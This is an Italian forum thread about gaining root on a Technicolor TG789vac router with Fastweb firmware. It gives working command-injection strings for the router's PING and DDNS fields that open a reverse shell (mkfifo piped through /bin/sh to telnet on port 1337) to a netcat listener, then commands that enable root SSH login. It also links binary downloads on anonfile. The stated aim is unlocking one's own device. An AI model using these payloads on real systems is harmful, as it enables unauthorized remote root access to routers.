[larsen64it]

Test strongswan 5.5.1
https://anonfile.com/3eRbVcT8n3/strongswan-5.5.1_zip

[larsen64it]

Procedura semplificata per lo sblocco:
Mettere netcat in ascolto
nc -lvvp 1337
Se il firmware è vulnerabile sul campo  PING inserite la seguente stringa

Codice: [Seleziona]

:::::::; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet IP-PC 1337 >/tmp/f &Se il firmware è vulnerabile sul campo DDNS  inserite la seguente stringa

Codice: [Seleziona]

www.ooo.com; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet IP-PC 1337 >/tmp/f &Attendere un attimo e su netcat apparirà la shell  #

sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd;uci set dropbear.@dropbear[0].PasswordAuth='on';uci set dropbear.@dropbear[0].Interface='lan';uci set dropbear.@dropbear[0].RootPasswordAuth='on';uci set dropbear.@dropbear[0].RootLogin='1';uci set dropbear.@dropbear[0].enable='1';uci set system.@coredump[0].reboot='0';sed -i 's/#//' /etc/inittab;uci commit;/etc/init.d/dropbear restart

Fatto

Con l'occasione ho aggiornato la lista pacchetti.

[LuKePicci]

Ma scusa AutoFlashGUI da solo non ci riesce? (Generic Ping/Generic DDNS) ?

PS: c'è del bbcode rimasuglio nel comando di sblocco dove disabiliti coredump

[larsen64it]

Grazie meglio di così non mi viene.
Ti rispondo da quel ignorantone che sono, non ho mai usato AutoFlashGUI per nessun router, ma credo che funzioni visto che sono comandi standard.

[LuKePicci]

Manco io l'ho mai usato eheheh
Però devo a breve aggiungere anche questo modello sulla wiki internazionale e tra i metodi già documentati c'è AFG quindi mi viene comodo indicare quello.

[larsen64it]

Bug fix per la configurazione di samba e pianificazione wireless (tod)  della gui + attivazione wifi guest (sostituite bla bla bla con i vostri dati).
https://anonfile.com/r5laocWfn7/config.tar_gz
Bug fix miniupnpd in quanto per alcuni programmi (emule) non funziona.  Fate una copia di /usr/sbin/miniupnpd-igdv1 e miniupnpd-igdv2 e sostituitelo con il seguente file e rinominatelo come i 2 file sostituiti. Si potrebbe fare anche un fix come sui dga.
https://anonfile.com/1bl4o5Wan4/miniupnpd
Attenzione al minidlna: in sede di inizializzazione potrebbe cancellare il contenuto del supporto.
A questo punto questo router può/potrebbe vantare gli stessi strumenti e app  di tutti gli altri  router tch, luci a parte (per quello che serve).

[andrewred]

Una volta ottenuto accesso root sul TG789vac Xtream 35b Fastweb con firmware Jade, è possibile bypassare la GUI dell'operatore e impostare parametri di un altro operatore? L'utility di Ansuel AGTEF unlocker si blocca con l'avviso che non è possibile ultimare la procedura. E resta la GUI originale.
Sicuramente sarà già stato spiegato .... ringrazio per le istruzioni relative all'ottenimento dell'accesso root, la procedura ha funzionato benissimo.

[larsen64it]

La fui funziona bene con l'ultimo firmware disponibile 16.2.8706 iad o mos che sia.
Per installarla non si usa  l'unlocker AGTEF, ma come su tutti gli altri technicolor.
Se off line scarica la gui e mettila in /tmp
Se on line
curl -k https://raw.githubusercontent.com/Ansuel/gui-dev-build-auto/master/GUI_dev.tar.bz2 --output /tmp/GUI_dev.tar.bz2
Poi i tutti i due i casi
bzcat /tmp/GUI_dev.tar.bz2 | tar -C / -xvf -
/etc/init.d/rootdevice debug

[andrewred]

 Grazie larsen64it, appena posso provo e comunicherò risultato. Quando i miei amici che cambiano operatore dicono 'buttare via' le mie orecchie intendono 'recuperare' e con l'ausilio vostro in genere si riesce a 'recuperare' un buon muletto.

[larsen64it]

Non lo dire a me. Più vecchio è e meglio è, io in primis... anche se c'è poco da recuperare.

[LuKePicci]

@larsen64it credo che nella prima variante del comando manchi la porta 1337 proposta subito prima

Mettere netcat in ascolto
nc -lvvp 1337
Se il firmware è vulnerabile sul campo  PING inserite la seguente stringa

Codice: [Seleziona]

:::::::; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet IP-PC >/tmp/f &...

[larsen64it]

Corretta anche questa grazie... eppure l'avevo appena detto.

Più vecchio è e meglio è, io in primis... anche se c'è poco da recuperare.

[andrewred]

Eseguito alla lettera, ma al riavvio dopo iniziale logo Technicolor e richiesta credenziali (admin/admin, se provo deliberatamente altre credenziali mi da giustamente errore) dopo la verifica delle stesse, entro in una schermata da cui non posso fare nulla. Le tiles configurazione guidata, schede etc . non si aprono. Riproverò intera procedura.
P.S.: il tasto reset non funziona più.

[larsen64it]

L'importante che sei con l'ultimo firmware con quelli vecchi la gui non funziona. Probabile che si sia incasinato con l'unlocker.
Per fare il "reset" basta che cancelli la cartella  /overlay/bank_1 (sei in bank_1 vero?)
Prima pero prova con router on line ha dare il comando upgradegui per vedere se le cose cambiano.

[andrewred]

Ho interrotto e spento router quindi ricomincio da zero con netcat e via dicendo. Mi sembra di aver visto durante la precedente procedura che abbia effettuato uno switch sul bank 2, ma devo appunto ripartire e verificare. Se ci riesco.